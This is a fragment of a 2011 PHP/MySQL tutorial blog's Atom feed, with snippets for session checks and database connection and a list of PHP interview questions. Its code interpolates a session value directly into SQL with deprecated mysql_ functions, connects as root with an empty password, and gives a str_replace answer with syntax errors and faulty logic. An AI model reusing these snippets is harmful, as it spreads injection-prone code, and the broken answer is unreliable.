&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;header("Location:../login");&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-8042473785562126670?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/CkQ2wDrMp4cCte9p2iXgN0oIuDE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/CkQ2wDrMp4cCte9p2iXgN0oIuDE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/CkQ2wDrMp4cCte9p2iXgN0oIuDE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/CkQ2wDrMp4cCte9p2iXgN0oIuDE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/4iG_H7g9nwM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/8042473785562126670/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/12/session-destroy-or-unset-in-php.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8042473785562126670?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8042473785562126670?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/4iG_H7g9nwM/session-destroy-or-unset-in-php.html" title="session destroy or unset in php" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/12/session-destroy-or-unset-in-php.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcNRH85eip7ImA9WhRQGEU.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-6184773427548126259</id><published>2011-12-14T10:41:00.000-08:00</published><updated>2011-12-14T10:41:35.122-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-14T10:41:35.122-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>session check in php</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;!--?php&lt;/p--&gt;&lt;br /&gt;
include('config.php'); //connection file&lt;br /&gt;
session_start();&lt;br /&gt;
$user_check=$_SESSION['login_user'];&lt;br /&gt;
$ses_sql=mysql_query("select email from userdetails where email='$user_check' ");&lt;br /&gt;
$row=mysql_fetch_array($ses_sql);&lt;br /&gt;
$login_session=$row['email'];&lt;br /&gt;
$sesp_sql=mysql_query("select fname from userdetails where email='$user_check' ");&lt;br /&gt;
$rows=mysql_fetch_array($sesp_sql);&lt;br /&gt;
$login_session1=$rows['fname'];&lt;br /&gt;
if(!isset($login_session))&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
header("Location:../home.php");&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-6184773427548126259?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/umfG02p5Nv9jVcoXj14z0oW8orI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/umfG02p5Nv9jVcoXj14z0oW8orI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/umfG02p5Nv9jVcoXj14z0oW8orI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/umfG02p5Nv9jVcoXj14z0oW8orI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/mKJ6GvvOC7Y" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/6184773427548126259/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/12/session-check-in-php.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6184773427548126259?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6184773427548126259?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/mKJ6GvvOC7Y/session-check-in-php.html" title="session check in php" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/12/session-check-in-php.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DU4ASXk4eip7ImA9WhRQGEU.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-1421596331249613302</id><published>2011-12-14T10:37:00.000-08:00</published><updated>2011-12-14T10:39:08.732-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-14T10:39:08.732-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>Connection in php</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;!--? php&amp;nbsp;&lt;/p--&gt;&lt;br /&gt;
$mysql_hostname = "locahost";&lt;br /&gt;
$mysql_user = "root";&lt;br /&gt;
$mysql_password = "";&lt;br /&gt;
$mysql_database = "table name[userdetails]";&lt;br /&gt;
$con = mysql_connect($mysql_hostname, $mysql_user, $mysql_password)&lt;br /&gt;
or die("Opps some thing went wrong or not connect to databse");&lt;br /&gt;
mysql_select_db("database name", $con) or die("Opps some thing or not selected db ....");&lt;br /&gt;
?&amp;gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-1421596331249613302?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/K4sJu1Od3A870U0nKxzS3u22C0M/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/K4sJu1Od3A870U0nKxzS3u22C0M/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/K4sJu1Od3A870U0nKxzS3u22C0M/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/K4sJu1Od3A870U0nKxzS3u22C0M/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/MQBeAAdipc8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/1421596331249613302/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/12/connection-in-php.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/1421596331249613302?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/1421596331249613302?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/MQBeAAdipc8/connection-in-php.html" title="Connection in php" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/12/connection-in-php.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0QDQH05eip7ImA9WhRQF08.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-4786775104161191593</id><published>2011-12-12T09:19:00.000-08:00</published><updated>2011-12-12T12:22:51.322-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-12T12:22:51.322-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>Most Common php + mysql interview questions</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;These are some of the PHP&amp;nbsp;and MySQL question that you cannot avoid.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;All questions i got from this site &lt;span class="Apple-style-span" style="color: black;"&gt;&lt;b&gt;&lt;a href="http://knowlspace.wordpress.com/2011/06/21/most-common-php-mysql-interview-questions/" target="_blank"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-5bSEdidvAXU/TuZa1zI9BgI/AAAAAAAABkw/Dwnpg7pJLo4/s1600/malaysia-php-mysql.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-5bSEdidvAXU/TuZa1zI9BgI/AAAAAAAABkw/Dwnpg7pJLo4/s1600/malaysia-php-mysql.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;1 ) What will you use to initialize a string ? ie with single quotes or double quotes ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;Unlike the&amp;nbsp;&lt;/span&gt;double-quoted&lt;span class="Apple-style-span" style="background-color: white;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;syntaxes,&amp;nbsp;&lt;/span&gt;variables&lt;span class="Apple-style-span" style="background-color: white;"&gt;&amp;nbsp;and escape sequences for special characters will&amp;nbsp;&lt;/span&gt;&lt;em class="emphasis" style="background-color: white;"&gt;not&lt;/em&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&amp;nbsp;be expanded when they occur in single quoted&amp;nbsp;&lt;/span&gt;&lt;span class="type" style="background-color: white;"&gt;string&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;s.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;div class="para" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;As in single quoted&amp;nbsp;&lt;span class="type"&gt;string&lt;/span&gt;s, escaping any other character will result in the backslash being printed too. Before PHP 5.1.1, the backslash in&amp;nbsp;&lt;i&gt;\{$var}&lt;/i&gt;had not been printed.&lt;/span&gt;&lt;/div&gt;
&lt;div class="para" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;The most important feature of double-quoted&amp;nbsp;&lt;span class="type"&gt;string&lt;/span&gt;s is the fact that variable names will be expanded.&lt;/span&gt;&lt;/div&gt;
&lt;div class="para" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;2 ) You have a string “hi all, I said hello” . You want to replace the occourence of hi with hello and hello with hi . What will you do&amp;nbsp;?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: 21px;"&gt;&amp;nbsp;$rawstring&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: 21px; white-space: pre;"&gt;= "&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: 21px;"&gt;hi all, I said hello";&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;$placeholders = array('hi', 'hello'')&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;$malevals = array('hello', hi');&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;$malestr = str_replace($placeholders, $malevals, $rawstring);&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;echo &amp;nbsp;$malestr ;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;ereg() - Regular expression match&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;eregi() - Case insensitive regular expression match&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;eregi_replace() - Replace regular expression case insensitive&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;str_replace() - Replace all occurrences of the search string with the replacement string&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;preg_match() - Perform a regular expression match&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;==============&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;more details:&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;a href="http://php.net/manual/en/function.ereg-replace.php"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Arial, Helvetica, sans-serif;"&gt;http://php.net/manual/en/function.ereg-replace.php&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;a href="http://www.tizag.com/phpT/php-string-str_replace.php"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Arial, Helvetica, sans-serif;"&gt;http://www.tizag.com/phpT/php-string-str_replace.php&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b style="background-color: white;"&gt;3 ) What’s the difference between PHP4 and PHP5 ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b style="background-color: white;"&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;The new OOP features in PHP5 is probably the one thing that everyone knows for sure about. Out of all the new features, these are the ones that are talked about most!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span"&gt;1.&amp;nbsp;&lt;/span&gt;&lt;span style="text-align: left;"&gt;Passed by Reference&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;2. &amp;nbsp;Visibility[public, protected, private]&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;3.&amp;nbsp;Unified Constructors and Destructors&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;4.&amp;nbsp;The __autoload Function&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: #f8fafb;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;===========&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: #f8fafb;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;more details:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;a href="http://tycoontalk.freelancer.com/php-forum/78717-differences-between-php4-and-php5.html"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Arial, Helvetica, sans-serif;"&gt;http://tycoontalk.freelancer.com/php-forum/78717-differences-between-php4-and-php5.html&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;4 ) What’s all added in PHP 5.3 ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;PHP 5.3.0 offers a wide range of new features:&lt;/span&gt;&lt;/div&gt;
&lt;ul class="itemizedlist" style="background-color: white;"&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Support for&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.namespaces.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;namespaces&lt;/a&gt;&amp;nbsp;has been added.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Support for&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.oop5.late-static-bindings.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Late Static Bindings&lt;/a&gt;&amp;nbsp;has been added.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Support for&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/control-structures.goto.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;jump labels&lt;/a&gt;&amp;nbsp;(limited goto) has been added.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Support for native&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/functions.anonymous.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Closures&lt;/a&gt;&amp;nbsp;(Lambda/Anonymous functions) has been added.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;There are two new magic methods,&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.oop5.overloading.php#language.oop5.overloading.methods" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;__callStatic&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.oop5.magic.php#language.oop5.magic.invoke" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;__invoke&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;a class="link" href="http://www.php.net/manual/en/language.types.string.php#language.types.string.syntax.nowdoc" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Nowdoc&lt;/a&gt;&amp;nbsp;syntax is now supported, similar to&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.types.string.php#language.types.string.syntax.heredoc" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Heredoc&lt;/a&gt;&amp;nbsp;syntax, but with single quotes.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;It is now possible to use&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.types.string.php#language.types.string.syntax.heredoc" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Heredoc&lt;/a&gt;s to initialize static variables and class properties/constants.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;a class="link" href="http://www.php.net/manual/en/language.types.string.php#language.types.string.syntax.heredoc" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Heredoc&lt;/a&gt;s may now be declared using double quotes, complementing the&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.types.string.php#language.types.string.syntax.nowdoc" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Nowdoc&lt;/a&gt;&amp;nbsp;syntax.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;a class="link" href="http://www.php.net/manual/en/language.constants.syntax.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Constants&lt;/a&gt;&amp;nbsp;can now be declared outside a class using the&amp;nbsp;&lt;i&gt;const&lt;/i&gt;&amp;nbsp;keyword.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;The&amp;nbsp;&lt;a class="link" href="http://www.php.net/manual/en/language.operators.comparison.php#language.operators.comparison.ternary" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;ternary&lt;/a&gt;&amp;nbsp;operator now has a shorthand form:&amp;nbsp;&lt;i&gt;?:&lt;/i&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;The HTTP stream wrapper now considers all status codes from 200 to 399 to be successful.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Dynamic access to static methods is now possible.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;a class="link" href="http://www.php.net/manual/en/language.exceptions.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;Exceptions&lt;/a&gt;&amp;nbsp;can now be nested.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;A garbage collector for circular references has been added, and is enabled by default.&lt;/span&gt;&lt;/li&gt;
